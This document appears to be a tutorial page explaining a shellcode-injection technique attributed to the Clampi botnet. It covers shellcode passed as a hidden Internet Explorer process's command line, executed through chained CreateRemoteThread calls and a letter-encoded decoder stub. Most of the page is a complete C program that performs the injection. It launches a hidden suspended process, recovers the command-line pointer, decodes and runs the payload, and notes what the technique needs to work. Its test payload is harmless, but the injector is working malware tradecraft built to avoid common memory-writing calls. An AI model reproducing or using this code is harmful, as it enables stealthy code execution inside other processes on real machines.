Create an Internet Explorer process (iexplore.exe) in suspended mode with no visible window.
Inject the shellcode by passing it as the command line: Windows itself copies the string into the new process, so the injector never calls VirtualAllocEx or WriteProcessMemory. Printable bytes are shown literally below, the rest as \x escapes:
Code:
C:\\Program Files\\Internet Explorer\\iexplore.exe \xFC\xEB\x1A^\x8B\xFEW\xAC<Zt\x0F,A\xC0\xE0\x04\x8A\xD8\xAC,A\x02\xC3\xAA\xEB\xECX\xC3\xE8\xE1\xFF\xFF\xFFILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFOAPDBLJAIAAAAAAILNAFGIKMCCEAPAEEBIIAGEGMBOKAEOCPCMGAGAAFOILHNAEIDMHBFDDMAFGFHFAGKAEFAGKPPLIFMJEIAHMPPNAILNIIFMAHFBALIDBADJBHMPPNADNLHAAAAAAHELJOLEODDMAFHFAFAGIBPAAAPAAFDLIAFLJIAHMPPNAIFMAHEDALJAJAAAAAAIJAEAIIJFMAIAEOIBEAAAAAAILOMILHFAEILFOANPPHGAJLIHELJIAHMPPNAOLALIPEEAIAIILPIPMPDKEOLAKFDLIEHJLIAHMPPNADDMAILOFMDZ\0
Use the CreateRemoteThread API to create a remote thread
at memory location 0x7C812F1D …
This is where the kernel32.dll export GetCommandLineA (a user-mode function, not a kernel function)
has been mapped into Internet Explorer's memory. kernel32 is loaded at the same base in every 32-bit process, so the injector's own GetProcAddress result for GetCommandLineA is valid in the target; 0x7C812F1D is the address on the author's Windows XP build and differs on other builds and service packs …
GetCommandLineA returns a pointer to the child's copy of the command line, i.e. to the "shell" string. A thread's return value (EAX) becomes its exit code, so the injector reads that pointer back with GetExitCodeThread; nothing has to be written into the target and no memory has to be searched …
Call CreateRemoteThread again with that pointer as the start address, 0x004A23DC in this run …. The first 34 bytes of the string are a small decoder (cld, then a loop that turns each pair of letters A..P into one byte in place and stops at 'Z'), so this thread rebuilds the real payload and hands its address back through the exit code in the same way …
Call ReadProcessMemory ….
Call MapViewOfFileEx on the object …
Once again call CreateRemoteThread to execute the injected code!
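The chain above as working C. This is an added example, not Clampi's code and not the researchers' tooling: the 34 decoder-stub bytes and the first 34 letters of the payload are copied from the command line on this page, while the function names, the 2048-byte buffer, and the constructed mov eax,0x1337 ; ret test payload are my own assumptions. The portable part models what the stub does to the command line so you can check what a given string will decode to; the part under _WIN32 performs steps 1 to 4 and assumes a 32-bit build, a 32-bit iexplore.exe at the page's path, and a target running without DEP.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decoder stub that opens the page's command line (34 bytes copied from the page).
   It has no NUL byte, and every byte survives the ANSI -> Unicode -> ANSI round
   trip the command line makes on the Windows-1252 code page; the payload proper
   is encoded with letters A..P so it needs neither property. */
static const unsigned char clampi_stub[34] = {
    0xFC,0xEB,0x1A,0x5E,0x8B,0xFE,0x57,0xAC,0x3C,0x5A,0x74,0x0F,0x2C,0x41,0xC0,0xE0,0x04,
    0x8A,0xD8,0xAC,0x2C,0x41,0x02,0xC3,0xAA,0xEB,0xEC,0x58,0xC3,0xE8,0xE1,0xFF,0xFF,0xFF };

/* First 34 letters of the page's encoded payload; 'Z' appended here because the
   sample is truncated (the page's full stream ends in ...FMDZ). */
static const char clampi_sample[] = "ILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFO" "Z";

/* Encode bytes the way the stub expects: high nibble, low nibble, each as 'A'+n,
   terminated by 'Z'. Returns chars written without the NUL, 0 if out is too small. */
size_t encode_nibbles(const unsigned char *in, size_t n, char *out, size_t cap)
{
    if (cap < 2 * n + 2) return 0;
    for (size_t i = 0; i < n; i++) {
        out[2 * i]     = (char)('A' + (in[i] >> 4));
        out[2 * i + 1] = (char)('A' + (in[i] & 0x0F));
    }
    out[2 * n] = 'Z';
    out[2 * n + 1] = '\0';
    return 2 * n + 1;
}

/* C model of the stub's loop (lodsb; cmp al,'Z'; je done; sub al,'A'; shl al,4;
   mov bl,al; lodsb; sub al,'A'; add al,bl; stosb). The stub validates nothing;
   this model returns -1 on a letter outside A..P or a missing 'Z', so a caller
   can tell a command line the code page mangled from a valid one. */
long decode_nibbles(const char *enc, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (;;) {
        char hi = *enc++;
        if (hi == 'Z') return (long)n;
        if (hi < 'A' || hi > 'P') return -1;
        char lo = *enc++;
        if (lo < 'A' || lo > 'P' || n == cap) return -1;
        out[n++] = (unsigned char)(((hi - 'A') << 4) | (lo - 'A'));
    }
}

/* The command-line tail the injector appends after the iexplore.exe path:
   stub, encoded payload, 'Z', NUL. Returns its length without the NUL, 0 on overflow. */
size_t build_cmdline(const unsigned char *payload, size_t n, char *out, size_t cap)
{
    if (cap < sizeof clampi_stub) return 0;
    memcpy(out, clampi_stub, sizeof clampi_stub);
    size_t enc = encode_nibbles(payload, n, out + sizeof clampi_stub, cap - sizeof clampi_stub);
    return enc ? sizeof clampi_stub + enc : 0;
}

#ifdef _WIN32   /* the injection itself: 32-bit build, 32-bit IE, DEP off for the target */
#include <windows.h>

/* Run start(param) as a thread inside proc and return its exit code, i.e. whatever
   the routine left in EAX: this is how a pointer travels back from the target. */
DWORD run_remote(HANDLE proc, DWORD start, void *param)
{
    DWORD rc = 0;
    HANDLE th = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)(uintptr_t)start,
                                   param, 0, NULL);
    if (!th) return 0;
    WaitForSingleObject(th, INFINITE);
    GetExitCodeThread(th, &rc);
    CloseHandle(th);
    return rc;
}

/* Steps 1 to 4 of the page. Returns the exit code of the decoded payload's thread. */
DWORD inject_via_cmdline(const unsigned char *payload, size_t n)
{
    static const char exe[] = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" ";
    char cmd[2048];
    size_t prefix = sizeof exe - 1;
    memcpy(cmd, exe, prefix);
    if (!build_cmdline(payload, n, cmd + prefix, sizeof cmd - prefix)) return 0;

    STARTUPINFOA si = { sizeof si };
    PROCESS_INFORMATION pi = { 0 };
    DWORD rc = 0;
    si.dwFlags = STARTF_USESHOWWINDOW;          /* step 1: suspended, hidden, shellcode */
    si.wShowWindow = SW_HIDE;                   /* in the command line */
    if (!CreateProcessA(NULL, cmd, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
        return 0;
    /* step 2: kernel32 has one base in every 32-bit process, so our GetCommandLineA
       address is valid in the child; the exit code is its return value there */
    DWORD remote_cmd = run_remote(pi.hProcess,
        (DWORD)(uintptr_t)GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetCommandLineA"), NULL);
    /* step 3: the child's command line is byte-for-byte ours, so the stub sits at the
       same offset; its thread decodes A..P in place and returns the decoded address */
    DWORD decoded = remote_cmd ? run_remote(pi.hProcess, remote_cmd + (DWORD)prefix, NULL) : 0;
    /* step 4: run the decoded payload */
    if (decoded) rc = run_remote(pi.hProcess, decoded, NULL);
    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return rc;
}

int main(void)
{
    /* constructed 32-bit payload, not Clampi's: mov eax, 0x1337 ; ret */
    static const unsigned char payload[] = { 0xB8, 0x37, 0x13, 0x00, 0x00, 0xC3 };
    printf("payload thread exit code: 0x%lX (expect 0x1337)\n",
           (unsigned long)inject_via_cmdline(payload, sizeof payload));
    return 0;
}
#endif
```

Two things the steps depend on. The command line lives on the target's heap, so a thread started there only runs where DEP is off or the heap is otherwise executable. And the string passes through an ANSI to Unicode to ANSI conversion, so the raw stub can only use bytes the code page maps both ways; 0x90 (nop) is not one of them on Windows-1252, which is one reason the payload proper is spelled out in letters A..P. Decoding the page's own sample with the model above gives mov ebp,esp ; call +9 over nine nops ; pop esi, which confirms the nibble scheme.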
This method is used by the Clampi botnet.
Thanks to the researchers …
Browse to them to get more info!